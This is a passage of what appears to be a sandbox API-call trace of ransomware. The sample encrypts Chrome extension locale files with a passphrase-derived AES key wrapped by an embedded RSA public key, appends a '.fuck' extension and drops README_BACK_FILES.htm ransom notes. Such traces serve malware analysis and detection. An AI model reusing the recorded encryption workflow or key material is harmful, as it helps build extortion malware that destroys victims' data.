CryptImportPublicKeyInfo (in: hCryptProv=0x2e74b38, dwCertEncodingType=0x1, pInfo=0x2eaf090*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaf0c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaf0c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e180) returned 1 [0263.746] CryptEncrypt (in: hKey=0x2e7e180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.746] CryptEncrypt (in: hKey=0x2e7e180, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e75550*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e75550*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.746] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e75550*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e75550*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.747] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.757] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.757] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.782] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.782] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.782] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.782] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.782] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.782] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.782] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.782] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.782] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.783] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.783] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.783] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.783] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.783] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.783] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.783] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.783] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.783] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.783] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.783] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.783] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.783] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.783] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.783] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.783] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.783] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.783] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.784] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.784] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.784] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.784] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.784] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.784] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.784] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.784] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.784] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.784] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.784] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.784] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.784] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.784] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.784] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.784] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.784] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.785] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.785] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.785] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.785] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.785] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.785] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.785] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.785] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xd7, lpOverlapped=0x0) returned 1 [0263.785] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd7, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0263.785] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0263.785] CloseHandle (hObject=0x5d5c) returned 1 [0263.785] CloseHandle (hObject=0x5d60) returned 1 [0263.785] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json"), bFailIfExists=0) returned 1 [0263.788] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json", dwFileAttributes=0x0) returned 1 [0263.789] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.gsg")) returned 1 [0263.790] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.fuck")) returned 1 [0263.791] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0263.791] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0263.791] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.791] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.791] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0263.791] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\readme_back_files.htm")) returned 0xffffffff [0263.792] AreFileApisANSI () returned 1 [0263.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.792] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.792] GetFileType (hFile=0x5d64) returned 0x1 [0263.793] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.794] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.794] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0263.794] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.794] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.794] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.794] GetLastError () returned 0x0 [0263.794] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json")) returned 0x20 [0263.795] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json", dwFileAttributes=0x80) returned 1 [0263.795] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.796] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.797] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.797] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.799] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.799] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0263.799] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.799] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0263.799] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.799] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.799] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e74bc0) returned 1 [0263.799] CryptImportPublicKeyInfo (in: hCryptProv=0x2e74bc0, dwCertEncodingType=0x1, pInfo=0x2eafa50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eafa80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eafa88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e800) returned 1 [0263.799] CryptEncrypt (in: hKey=0x2e7e800, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.800] CryptEncrypt (in: 